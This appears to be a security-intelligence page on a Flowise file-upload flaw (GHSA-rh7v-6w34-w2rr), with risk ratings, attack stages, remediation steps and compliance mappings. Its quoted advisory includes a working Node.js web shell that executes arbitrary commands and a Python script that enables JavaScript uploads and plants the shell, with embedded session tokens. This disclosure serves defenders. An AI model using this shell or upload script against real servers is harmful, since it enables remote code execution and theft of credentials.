GHSA-rh7v-6w34-w2rr: Flowise MIME bypass enables

Q: Is GHSA-rh7v-6w34-w2rr actively exploited?

No confirmed active exploitation of GHSA-rh7v-6w34-w2rr has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-rh7v-6w34-w2rr?

1. Patch immediately: upgrade flowise to version 3.1.0 or later. 2. If patching is delayed, restrict network access to the Flowise admin API — especially PUT /api/v1/chatflows/{id} — to trusted IP ranges only via WAF or network policy. 3. Audit the file attachments directory on the server for any .js files uploaded prior to patching; treat any found as indicators of compromise requiring full incident response. 4. Rotate all API keys, LLM provider credentials, and database passwords stored in or accessible from the Flowise environment. 5. Review server access logs for PUT requests to chatflow configuration endpoints containing 'application/javascript' in request bodies, and POST requests to /api/v1/attachments/ with Content-Type: application/javascript. 6. Implement server-side MIME type allowlisting independent of client-side UI controls.

Q: What systems are affected by GHSA-rh7v-6w34-w2rr?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI orchestration platforms, no-code AI workflow builders, multi-agent systems.

Q: What is the CVSS score for GHSA-rh7v-6w34-w2rr?

GHSA-rh7v-6w34-w2rr has a CVSS v3.1 base score of 7.1 (HIGH).

CISO Take

FlowiseAI contains a patch bypass of CVE-2025-61687 where any authenticated user can modify chatflow file upload settings via API to permit application/javascript MIME types, then upload a persistent Node.js web shell achieving full remote code execution on the host. Organizations that already patched the prior bypass remain fully vulnerable unless they have reached version 3.1.0. Exploitation complexity is trivial: a complete, weaponized PoC script — including the web shell and the Python upload exploit — is publicly disclosed in the GitHub advisory, requiring only a valid session token to execute. While not yet in CISA KEV, the combination of a fully disclosed PoC, low privilege requirement, and a package with 37 historical CVEs signals opportunistic exploitation is imminent. Upgrade to flowise 3.1.0 immediately; if patching is blocked, restrict API access to the chatflow configuration endpoint and audit existing attachment directories for unexpected .js files.

Sources: GitHub Advisory ATLAS NVD

What is the risk?

High risk. CVSS 7.1 with low privilege requirement (authenticated access only), low attack complexity, and network vector makes this accessible to any account-holding user or attacker who has compromised credentials. The prior patch bypass nature means organizations may carry a false sense of security from having patched CVE-2025-61687. A fully weaponized PoC is publicly available in the GitHub advisory, dramatically lowering the skill bar to script-kiddie level. The persistent web shell mechanism means successful exploitation survives session expiry and account revocation. The pattern of 37 CVEs in the flowise package signals systemic input validation weaknesses rather than an isolated incident.

How does the attack unfold?

Configuration Manipulation

Authenticated attacker sends a PUT request to the chatflow API endpoint, injecting application/javascript into the allowed MIME types list in chatbotConfig.

AML.T0081

Web Shell Upload

Attacker posts a malicious Node.js HTTP server script (shell.js) to the file attachment endpoint, which the server accepts and stores persistently on disk.

AML.T0079

Remote Code Execution

The uploaded web shell is triggered and begins accepting HTTP requests, providing the attacker an accessible command execution interface running on the server.

AML.T0072

Credential Harvest and Lateral Movement

Attacker exfiltrates LLM API keys, database credentials, and secrets from the compromised FlowiseAI host environment, pivoting to connected AI infrastructure and data stores.

AML.T0050

Configuration Manipulation

Authenticated attacker sends a PUT request to the chatflow API endpoint, injecting application/javascript into the allowed MIME types list in chatbotConfig.

AML.T0081

Web Shell Upload

Attacker posts a malicious Node.js HTTP server script (shell.js) to the file attachment endpoint, which the server accepts and stores persistently on disk.

AML.T0079

Remote Code Execution

The uploaded web shell is triggered and begins accepting HTTP requests, providing the attacker an accessible command execution interface running on the server.

AML.T0072

Credential Harvest and Lateral Movement

Attacker exfiltrates LLM API keys, database credentials, and secrets from the compromised FlowiseAI host environment, pivoting to connected AI infrastructure and data stores.

AML.T0050

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Flowise	npm	<= 3.0.13	`3.1.0`

Do you use Flowise? You're affected.

How severe is it?

CVSS 3.1

7.1 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Unchanged

C Low

I High

A None

What should I do?

6 steps

Patch immediately: upgrade flowise to version 3.1.0 or later.
If patching is delayed, restrict network access to the Flowise admin API — especially PUT /api/v1/chatflows/{id} — to trusted IP ranges only via WAF or network policy.
Audit the file attachments directory on the server for any .js files uploaded prior to patching; treat any found as indicators of compromise requiring full incident response.
Rotate all API keys, LLM provider credentials, and database passwords stored in or accessible from the Flowise environment.
Review server access logs for PUT requests to chatflow configuration endpoints containing 'application/javascript' in request bodies, and POST requests to /api/v1/attachments/ with Content-Type: application/javascript.
Implement server-side MIME type allowlisting independent of client-side UI controls.

How is it classified?

Code Execution Auth Bypass Agent Framework AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0072 - Reverse Shell AML.T0079 - Stage Capabilities AML.T0081 - Modify AI Agent Configuration

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.9.3 - Technical security measures for AI systems

NIST AI RMF

MANAGE 2.2 - Risks or other undesirable impacts of AI systems are addressed

OWASP LLM Top 10

LLM08 - Excessive Agency

Frequently Asked Questions

What is GHSA-rh7v-6w34-w2rr?

FlowiseAI contains a patch bypass of CVE-2025-61687 where any authenticated user can modify chatflow file upload settings via API to permit application/javascript MIME types, then upload a persistent Node.js web shell achieving full remote code execution on the host. Organizations that already patched the prior bypass remain fully vulnerable unless they have reached version 3.1.0. Exploitation complexity is trivial: a complete, weaponized PoC script — including the web shell and the Python upload exploit — is publicly disclosed in the GitHub advisory, requiring only a valid session token to execute. While not yet in CISA KEV, the combination of a fully disclosed PoC, low privilege requirement, and a package with 37 historical CVEs signals opportunistic exploitation is imminent. Upgrade to flowise 3.1.0 immediately; if patching is blocked, restrict API access to the chatflow configuration endpoint and audit existing attachment directories for unexpected .js files.

Is GHSA-rh7v-6w34-w2rr actively exploited?

No confirmed active exploitation of GHSA-rh7v-6w34-w2rr has been reported, but organizations should still patch proactively.

How to fix GHSA-rh7v-6w34-w2rr?

1. Patch immediately: upgrade flowise to version 3.1.0 or later. 2. If patching is delayed, restrict network access to the Flowise admin API — especially PUT /api/v1/chatflows/{id} — to trusted IP ranges only via WAF or network policy. 3. Audit the file attachments directory on the server for any .js files uploaded prior to patching; treat any found as indicators of compromise requiring full incident response. 4. Rotate all API keys, LLM provider credentials, and database passwords stored in or accessible from the Flowise environment. 5. Review server access logs for PUT requests to chatflow configuration endpoints containing 'application/javascript' in request bodies, and POST requests to /api/v1/attachments/ with Content-Type: application/javascript. 6. Implement server-side MIME type allowlisting independent of client-side UI controls.

What systems are affected by GHSA-rh7v-6w34-w2rr?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI orchestration platforms, no-code AI workflow builders, multi-agent systems.

What is the CVSS score for GHSA-rh7v-6w34-w2rr?

GHSA-rh7v-6w34-w2rr has a CVSS v3.1 base score of 7.1 (HIGH).

What is the AI security impact?

Affected AI Architectures

agent frameworksAI orchestration platformsno-code AI workflow buildersmulti-agent systems

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0072 Reverse Shell

AML.T0079 Stage Capabilities

AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.9.3

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM08

What are the technical details?

Original Advisory

### Summary In FlowiseAI, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). ### Details This is a bypass of [GHSA‑35g6‑rrw3‑v6xc](https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc) (CVE‑2025‑61687). The Chatflow file upload settings do not properly validate MIME types. An attacker can add the `application/javascript` MIME type when updating a Chatflow, allowing .js files to be uploaded. JavaScript files are not listed as an option for file upload types within web user interface: <img width="1162" height="440" alt="Screenshot 2026-01-08 152306" src="https://github.com/user-attachments/assets/f33f04af-877e-4aac-95a7-86d4684891de" /> ### PoC #### shell.js (Node.js Web Shell) ``` const { exec } = require('child_process'); const http = require('http'); const server = http.createServer((req, res) => { const url = new URL(req.url, 'http://localhost'); const cmd = url.searchParams.get('cmd'); if (cmd) { console.log(`Executing: ${cmd}`); exec(cmd, (error, stdout, stderr) => { res.writeHead(200, {'Content-Type': 'text/plain'}); if (error) { res.end(`Error: ${error.message}\n${stderr || ''}`); } else { res.end(stdout || 'Command executed successfully'); } }); } else { res.writeHead(200, {'Content-Type': 'text/html'}); res.end(` <h1>Node.js Web Shell</h1> <p>Use ?cmd=command to execute</p> <p>Example: ?cmd=id</p> `); } }); const PORT = 8888; server.listen(PORT, '0.0.0.0', () => { console.log(`Shell running on port ${PORT}`); console.log(`Access: http://localhost:${PORT}?cmd=id`); }); ``` #### Python Upload Script ``` import requests import uuid TARGET_URL = "http://192.168.236.131:3000" CHATFLOW_ID = "dfd67fff-23b5-4f62-a0b3-59963cabc3b2" cookie_str = 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOTRiOGY2MTIyMzI3ZmFmODg0YzM4OGM4Y2YwZTg3ZGU6MTVkNDc4MDFjNTQ0N2Q3NDU2Mzg3OWE2N2E5YmJjNmM0M2JiYjYzNDE0Y2MzZWY2ZThkYjAzZTRhNjM3MjBiNzA5NmI3YmIwMGM3YWI3YTRmM2QzN2E2OTRiMGVmY2UzOTFiZGU3MWJiNWViZDIyN2ZhNzc0NmQ0ZjFmNTM5NTFhOGJkNjdlMzEyZjMzOTk5OWQ0ZGNkYmVmYWU3OWI4NSIsImlhdCI6MTc2Nzg1ODE2NSwibmJmIjoxNzY3ODU4MTY1LCJleHAiOjE3Njc4NjE3NjUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.lUtIFztKIT6Ld8cnPaPnPfm0B47yhurPJRW6JhtSwu8; refreshToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOThmZGE5YWE2MDZhYTA3YTMxYjZlYzhjZTkyMmZkMDA6ZTU2ZTczMTEwYjY3ZDE3ZTM3MjViZWI2YzMyYWYzNTNkOWExNzIzZWU0NzdiN2ZiMDQ1N2Q0M2JmZTY0NTIxZTlkNjM2ZWQwODgxNWJiNzU4Mjg2ZDQ3OGMwNTA3NTRkZTgwMWIwODljNDQ5YjhhZjVkODU2YWFiMzk4NTBjNjNlZjRmY2UzMmY4YWYzZmQxNGQzMmVhYzVhYjVmM2NjZCIsImlhdCI6MTc2Nzg1MzU4NSwibmJmIjoxNzY3ODUzNTg1LCJleHAiOjE3NzU2Mjk1ODUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.U3mm0ONOeGFP1gD-mPT90Iz_Ewwf-YXzmTPwoOEHG_g; connect.sid=s%3Avwp7SDKi02Mzu_nTF3-IZ-RfgmMnnp5o.K7kb5eg9CJ%2FuxupG4rJrT6I0fu0H93OTd5trNC0u88Y' js_mime_type = 'application/javascript' CHAT_ID = str(uuid.uuid4()) def configure_chatflow_uploadfile(): url = f"{TARGET_URL}/api/v1/chatflows/{CHATFLOW_ID}" headers = {'Cookie': cookie_str, 'x-request-from': 'internal'} chatbot_configdata = {"chatbotConfig":'{\"fullFileUpload\":{\"status\":true,\"allowedUploadFileTypes\":\"' + js_mime_type + ',text/css,text/csv,text/html,application/json,text/markdown,application/x-yaml,application/pdf,application/sql,text/plain,application/xml,application/msword,application/vnd.openxmlformats-officedocument.wordprocessingml.document,application/vnd.openxmlformats-officedocument.spreadsheetml.sheet,application/vnd.openxmlformats-officedocument.presentationml.presentation\",\"pdfFile\":{\"usage\":\"perPage\",\"legacyBuild\":false}}}'} r = requests.put(url, headers=headers, json = chatbot_configdata) if js_mime_type in r.text: print("[+] Enabled .js file uploads") else: print("[-] Failed to enable .js file uploads") def upload_shell(): url = f"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}" headers = {'Cookie': cookie_str} files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/javascript')} r = requests.post(url, headers=headers, files=files) if r.status_code == 200: print("[+] Upload success") print(r.text) else: print(f"[-] Upload failed ({r.status_code})") print(r.text) if __name__ == "__main__": configure_chatflow_uploadfile() upload_shell() ``` <img width="839" height="231" alt="image" src="https://github.com/user-attachments/assets/0d2e8384-8da6-4ada-a81a-a85c49476673" /> ### Impact An attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.

Exploitation Scenario

An attacker with a low-privilege FlowiseAI account — or a stolen session token obtained via credential stuffing or phishing — sends a crafted PUT request to /api/v1/chatflows/{id} inserting 'application/javascript' into the allowedUploadFileTypes field of the chatbotConfig JSON. They then POST a Node.js web shell to /api/v1/attachments/{chatflowId}/{chatId} with Content-Type: application/javascript using the publicly available exploit script. The shell persists on disk at a known attachment path. The attacker triggers execution either by discovering how Flowise processes or serves uploaded files, by chaining another vulnerability, or by waiting for an administrator to inadvertently invoke it. Once the shell is running on port 8888, the attacker has persistent HTTP-accessible command execution: they exfiltrate LLM API keys from environment variables, pivot to connected PostgreSQL databases, and maintain a backdoor that survives account password resets.

Weaknesses (CWE)

CWE-434 Unrestricted Upload of File with Dangerous Type Primary

CWE-434 — Unrestricted Upload of File with Dangerous Type: The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.

[Architecture and Design] Generate a new, unique filename for an uploaded file instead of using the user-supplied filename, so that no external input is used at all.[REF-422] [REF-423]
[Architecture and Design] When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Source: MITRE CWE corpus.